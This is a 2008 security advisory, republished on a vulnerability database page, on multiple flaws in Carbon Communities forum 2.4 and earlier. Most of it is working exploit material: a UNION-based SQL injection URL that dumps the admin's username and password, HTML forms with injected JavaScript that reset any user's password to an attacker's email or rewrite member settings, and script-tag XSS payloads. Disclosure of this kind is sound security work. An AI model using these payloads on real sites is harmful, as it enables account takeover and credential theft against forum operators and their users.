|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 3819 CVE : CVE-2008-1895 CVE : CVE-2008-1896 CVE : CVE : CVE-2008-1900 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : AmnPardaz Security Research Team Published : 19.04.2008
Advisory Text : ########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: Multiple Vulnerabilities in Carbon Communities forum. # Vendor: www.carboncommunities.com # Vulnerable Version: 2.4 and prior versions # Exploit: Available # Impact: High # Fix: N/A # Original Advisory: http://bugreport.ir/index.php?/35 ######################################################################## ########### #################### 1. Description: #################### Carbon Communities is a high powered, fully scalable, and highly customizable online portal, message boards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software rolled into one. #################### 2. Vulnerability: #################### 2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain usernames and passwords. 2.1.1. POC: Check exploits section. 2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any password to his/her email address.(exploit available) 2.2.1. POC: Check exploits section. 2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member info.(exploit available) 2.3.1. POC: Check exploits section. 2.4. There are some XSS in "login.asp" and "member_send.asp". 2.4.1. POC: /login.asp?Redirect='><script>alert('XSS')</script><fake a=' /member_send.asp?OrderBy='><script>alert('XSS')</script><fake a=' #################### 3. Exploits: #################### Original Exploit URL: http://bugreport.ir/index.php?/35/exploit 3.1. Attacker can gain usernames and passwords: ------------- http://[CarbonCommunitiesURL]/events.asp?ID=-1 union all select 1,1,1,'Username= '%2bmember_name%2b'<br>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name = 'admin' ------------- 3.2. Attacker can send any password to his/her email address: ------------- <script language="javascript"> function check(){ document.getElementById("UserName").value = "1' or uCase(Member_Name)='"+ document.getElementById("UserName").value } </script> <form action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post" onsubmit="check()"> UserName: <input type="text" name="UserName" id="UserName" value="default" size="100" /> <br /> EMail: <input type="text" name="EMail" value="Your Email Address" size="100" /> <br /> <input type="submit" /> </form> ------------- 3.3. Attacker can update member info.: ------------- <form action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit" method="post"> ID<input type="text" name="ID" value="1"/> <br /> Member_Cookies<input type="text" name="Member_Cookies" value="Yes" /> <br /> Member_SystemCookies<input type="text" name="Member_SystemCookies" value="Yes" /> <br /> Member_Center<input type="text" name="Member_Center" value="1" /> <br /> Member_EmailTheadResponse<input type="text" name="Member_EmailTheadResponse" value="1" /> <br /> Member_EmailPostResponse<input type="text" name="Member_EmailPostResponse" value="1" /> <br /> Member_WeekStart<input type="text" name="Member_WeekStart" value="0" /> <br /> Member_ThreadDays<input type="text" name="Member_ThreadDays" value="0" /> <br /> Member_ThreadView<input type="text" name="Member_ThreadView" value="0" /> <br /> Member_Invisible<input type="text" name="Member_Invisible" value="1" /> <br /> Member_HiddenEmail<input type="text" name="Member_HiddenEmail" value="0" /> <br /> Member_ReceivePM<input type="text" name="Member_ReceivePM" value="1" /> <br /> Member_PMEmailNotice<input type="text" name="Member_PMEmailNotice" value="1" /> <br /> Member_PMPopup<input type="text" name="Member_PMPopup" value="1" /> <br /> Member_Newsletter<input type="text" name="Member_Newsletter" value="0" /> <br /> Member_TimeZone<input type="text" name="Member_TimeZone" value="0" /> <br /> Member_DefaultColor<input type="text" name="Member_DefaultColor" value="1" /> <br /> <input type="submit" /> </form> ------------- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitised. #################### - Credit : #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |